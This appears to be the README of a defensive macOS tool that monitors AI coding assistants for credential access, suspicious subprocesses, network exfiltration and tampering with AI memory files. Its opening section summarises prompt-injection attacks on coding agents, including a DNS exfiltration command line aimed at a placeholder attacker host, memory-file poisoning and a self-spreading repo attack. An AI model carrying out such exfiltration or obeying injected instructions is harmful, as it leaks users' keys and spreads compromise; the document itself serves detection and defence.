shahar-dagan/agent-shield

Agent Shield

Runtime security monitor for AI coding tools on macOS.

Watches Claude Code, Cursor, Cline, Copilot, and Codex at the OS level — file reads, subprocess spawning, network connections, and AI memory directories — and alerts when something looks wrong.

All event data stays in a local SQLite database.


Why this exists

AI coding tools have broad filesystem and network access. Between keystrokes, you have no visibility into which files they're reading, what subprocesses they're spawning, or whether they've touched your .env or ~/.ssh.

Three attacks shaped what this monitors:

CVE-2025-55284 — Prompt injection causes Claude Code to run ping $(base64-encoded-credentials).attacker.com. Your API keys leave via DNS — invisible to HTTPS-layer proxies.

SpAIware (Windsurf, August 2025) — Malicious content injected into AI memory files. Every future session silently exfiltrates data before doing any work. The injection point is a file, not a network request.

AgentHopper — AI reads a malicious repo, injects payloads into local source files, git-pushes to spread, infects the next developer's agent. No single event looks alarming; the sequence is: file read → file write → git push.

That last one is why the cross-event correlation engine exists. Individual events are normal. The sequence is not.
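To make the idea concrete, here is a minimal sketch of ordered-sequence matching inside a time window. It is not the code in detector.py: the `Event` fields, the event kind names, and the 300-second default window are all assumptions chosen for illustration.

```python
from collections import deque
from dataclasses import dataclass


@dataclass(frozen=True)
class Event:
    ts: float   # seconds since epoch
    pid: int    # AI-tool process the event is attributed to (assumed field)
    kind: str   # hypothetical kinds: "file_read", "file_write", "git_push"


# Hypothetical pattern mirroring the AgentHopper chain described above.
PATTERN = ("file_read", "file_write", "git_push")


class SequenceDetector:
    """Flags a pid when PATTERN occurs in order within `window` seconds."""

    def __init__(self, pattern=PATTERN, window=300.0):
        self.pattern = pattern
        self.window = window
        self.history = {}  # pid -> deque of recent events

    def observe(self, event):
        events = self.history.setdefault(event.pid, deque())
        events.append(event)
        # Drop events that have aged out of the window.
        while events and event.ts - events[0].ts > self.window:
            events.popleft()
        # Only the final step of the pattern can complete a match.
        if event.kind != self.pattern[-1]:
            return False
        # Ordered subsequence match; unrelated events may sit in between.
        idx = 0
        for e in events:
            if e.kind == self.pattern[idx]:
                idx += 1
                if idx == len(self.pattern):
                    return True
        return False
```

Each individual `observe` call on a read or a write returns `False`; only the push that completes the chain for the same pid, inside the window, returns `True`.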


What's built

  • FSEvents file watcher — real-time, no polling; watches sensitive paths (~/.ssh/, ~/.aws/, .env files) and AI memory directories (~/.claude/, ~/.cursor/, etc.)
  • Process tree monitoring — tracks subprocess chains spawned by AI tools
  • Network classification — classifies outbound connections as known-safe, unknown, or threat-intel-flagged
  • Cross-event sequence detection: cred read → unknown network → git push triggers a combined alert
  • Two-phase injection scanning — fast regex first, Claude API only on regex hits (keeps cost low)
  • SpAIware detection — FSEvents watcher on AI memory directories
  • MCP server allowlisting — discovers and tracks Model Context Protocol servers
  • Weekly threat intel refresh — research agent (Exa + Claude) updates detection rules automatically
  • Policy enforcement — kill/suspend/block on confirmed threats (opt-in; monitor-only by default)
  • Web dashboard at localhost:6080
  • Menu bar app — quick status and alerts

Quick start

Requirements: macOS (FSEvents is Apple-specific), Python 3.11+

git clone https://github.com/shahar-dagan/ai-security.git
cd ai-security
pip install -r requirements.txt

# Start the monitor daemon
python3 collector.py

# Dashboard at http://localhost:6080
python3 web.py

To run as a background service:

cp com.aisecurity.collector.plist ~/Library/LaunchAgents/
launchctl load ~/Library/LaunchAgents/com.aisecurity.collector.plist

To stop:

launchctl unload ~/Library/LaunchAgents/com.aisecurity.collector.plist
pkill -f collector.py

Dashboard

The web dashboard (http://localhost:6080) shows:

Tab             What it shows
Processes       AI tools and their process trees, live
Network         Outbound connections classified by trust level
Unknown Hosts   Connections to unrecognized destinations
Files           File access events, tiered by sensitivity
Sensitive       Accesses to credentials and config files
Injections      Prompt injection scan results
Policy Events   Enforcement actions taken
MCP Servers     Discovered MCP servers and allowlist status
Packages        Supply chain scan results for AI-installed packages
Settings        Policy configuration and enforcement toggles

AI incident analysis

If you set ANTHROPIC_API_KEY, the AI incident analyst activates. When a security event is flagged, it sends context to the Claude API to generate a plain-language incident report explaining what happened and why it looks suspicious.

Privacy note: The AI analyst sends process names, file paths, hostnames, and IP addresses to the Anthropic API. No raw file contents are sent. You can disable it in Settings → AI Incident Analysis to run entirely on-device with no external API calls.

Without ANTHROPIC_API_KEY, Agent Shield runs fully local with no external network calls.
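One way to enforce the privacy note is an allowlist applied before anything leaves the machine. The sketch below assumes hypothetical event field names and a hypothetical settings toggle; it illustrates the metadata-only rule and is not the code in analyst.py.

```python
import os

# Assumed field names for the four metadata types the privacy note lists.
ALLOWED_FIELDS = ("process_name", "file_path", "hostname", "ip_address")


def analyst_enabled(settings_toggle: bool = True, env=os.environ) -> bool:
    """The analyst runs only if the toggle is on and an API key is set."""
    return settings_toggle and bool(env.get("ANTHROPIC_API_KEY"))


def build_analyst_context(event: dict) -> dict:
    """Copy only allowlisted metadata; file contents are never included."""
    return {k: event[k] for k in ALLOWED_FIELDS if k in event}
```

An allowlist fails closed: a new event field stays local unless someone adds it to `ALLOWED_FIELDS` deliberately.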


CLI

# Event statistics
python3 query.py stats

# Recent alerts (last 24 hours)
python3 query.py alerts --days 1

# Incident reports
python3 query.py incidents

Threat intel

threat_intel/latest.json is loaded at startup by the file scanner and network classifier. It extends the built-in detection rules with patterns from recent research.
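As a rough illustration of how a loaded file could extend built-in rules, the sketch below merges extra flagged hosts into a three-way network classifier. The `flagged_hosts` key, the built-in safe list, and the function names are assumptions; the real schema of latest.json is not documented here.

```python
import json
from pathlib import Path

# Hypothetical built-in allowlist; the project's actual list is not shown.
BUILTIN_SAFE = {"anthropic.com", "github.com"}


def load_flagged_hosts(path) -> set:
    """Read extra flagged hosts; a missing or malformed file adds nothing."""
    try:
        data = json.loads(Path(path).read_text())
    except (OSError, json.JSONDecodeError):
        return set()
    if not isinstance(data, dict):
        return set()
    hosts = data.get("flagged_hosts", [])  # assumed key name
    return {h.lower() for h in hosts if isinstance(h, str)}


def _matches(host: str, domains) -> bool:
    """True if host equals a listed domain or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def classify_host(host: str, flagged, safe=BUILTIN_SAFE) -> str:
    # Threat intel wins over the allowlist if a host appears in both.
    if _matches(host, flagged):
        return "threat-intel-flagged"
    if _matches(host, safe):
        return "known-safe"
    return "unknown"
```

Matching on whole domain labels avoids treating a lookalike such as notgithub.com as a subdomain of github.com.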

To refresh threat intel manually:

EXA_API_KEY=<key> ANTHROPIC_API_KEY=<key> python3 -m agents.research_agent

Or run the research agent on a daily loop:

EXA_API_KEY=<key> ANTHROPIC_API_KEY=<key> python3 -m agents.research_agent --loop

Architecture

collector.py              main daemon — orchestrates all components
  monitor.py              process/file/net polling, threat classification
  sensitive_watcher.py    FSEvents watcher for credential/config paths
  memory_watcher.py       FSEvents watcher for AI memory dirs (SpAIware)
  loop_monitor.py         intra-session behavioral anomaly detection
  detector.py             cross-event sequence detection
  baseline.py             per-process behavioral baselining
  alerter.py              alert dedup, DB write, OS notifications
  analyst.py              Claude-powered incident investigation
  policy.py               enforcement: kill/suspend on confirmed threats
  mcp_watcher.py          MCP server discovery and allowlisting
  enrichment.py           binary signing, ASN lookup
  agents/
    injection_scanner.py  file injection detection (regex + Claude)
    package_scanner.py    supply chain detection (fast rules + Claude)
    research_agent.py     threat intel: Exa search → Claude → rule updates

Events are stored in events.db (SQLite, local only).
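For readers who want to picture the storage layer, here is a small sketch of a local SQLite event store with a time-bounded alert query, similar in spirit to `query.py alerts --days 1`. The table layout, column names, and severity values are hypothetical; the actual events.db schema may differ.

```python
import sqlite3
import time

# Hypothetical schema, for illustration only.
SCHEMA = """
CREATE TABLE IF NOT EXISTS events (
    id       INTEGER PRIMARY KEY,
    ts       REAL NOT NULL,
    kind     TEXT NOT NULL,
    severity TEXT NOT NULL,
    detail   TEXT
)
"""


def open_db(path=":memory:"):
    """Open (or create) the event store; defaults to an in-memory DB."""
    conn = sqlite3.connect(path)
    conn.execute(SCHEMA)
    return conn


def record_event(conn, kind, severity, detail, ts=None):
    conn.execute(
        "INSERT INTO events (ts, kind, severity, detail) VALUES (?, ?, ?, ?)",
        (time.time() if ts is None else ts, kind, severity, detail),
    )
    conn.commit()


def recent_alerts(conn, days=1, now=None):
    """Return (kind, detail) rows for alerts from the last `days` days."""
    cutoff = (time.time() if now is None else now) - days * 86400
    rows = conn.execute(
        "SELECT kind, detail FROM events "
        "WHERE severity = 'alert' AND ts >= ? ORDER BY ts DESC",
        (cutoff,),
    )
    return rows.fetchall()
```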


Why not a network proxy?

Tools like CodeGate, Pipelock, and Sysdig sit in the network path and inspect API calls. That architecture can't see file reads, subprocess spawning, or DNS exfiltration via ping. It can't monitor what the AI writes to its own memory directories, which is where SpAIware lives.

The attack surface isn't the API layer. It's the OS.
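As an example of what OS-level visibility allows, a monitor that sees subprocess arguments can flag DNS lookups whose hostname carries an encoded payload. By the time the process is spawned the shell has already expanded `$(...)`, so the argument contains the encoded value itself. The tool list, the 24-character threshold, and the function name below are illustrative assumptions, not the project's actual rules.

```python
import re

# Commands that trigger a DNS lookup for a hostname argument (assumed list).
DNS_TOOLS = {"ping", "nslookup", "dig", "host"}

# A long run of base64- or hex-like characters in a single DNS label.
ENCODED_LABEL = re.compile(r"^[A-Za-z0-9+/=_-]{24,}$")


def looks_like_dns_exfil(argv) -> bool:
    """Heuristic: DNS tool invoked with an encoded-looking subdomain."""
    if not argv:
        return False
    tool = argv[0].rsplit("/", 1)[-1]  # strip any directory prefix
    if tool not in DNS_TOOLS:
        return False
    for arg in argv[1:]:
        if arg.startswith("-") or "." not in arg:
            continue  # skip flags and bare values such as counts
        labels = arg.split(".")
        # Ignore the last two labels (registered domain and TLD).
        if any(ENCODED_LABEL.match(label) for label in labels[:-2]):
            return True
    return False
```

A heuristic like this produces false positives on long legitimate subdomains, so it suits the alert-and-correlate model better than automatic enforcement.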


Honest limitations

  • macOS only — FSEvents is Apple-specific. Linux support would require inotify (not yet implemented)
  • Python daemon — no polished installer yet; requires manual setup
  • Monitor-only by default — enforcement (process kill, network block) is opt-in in Settings
  • No kernel extension — uses userspace APIs (FSEvents, lsof, psutil); a determined process could evade this

Tests

python3 -m pytest tests/ -v

Roadmap

See ROADMAP.md for the full plan: polished macOS agent, CI/CD scanner, shared threat intel layer, and team/enterprise distribution model.


License

MIT
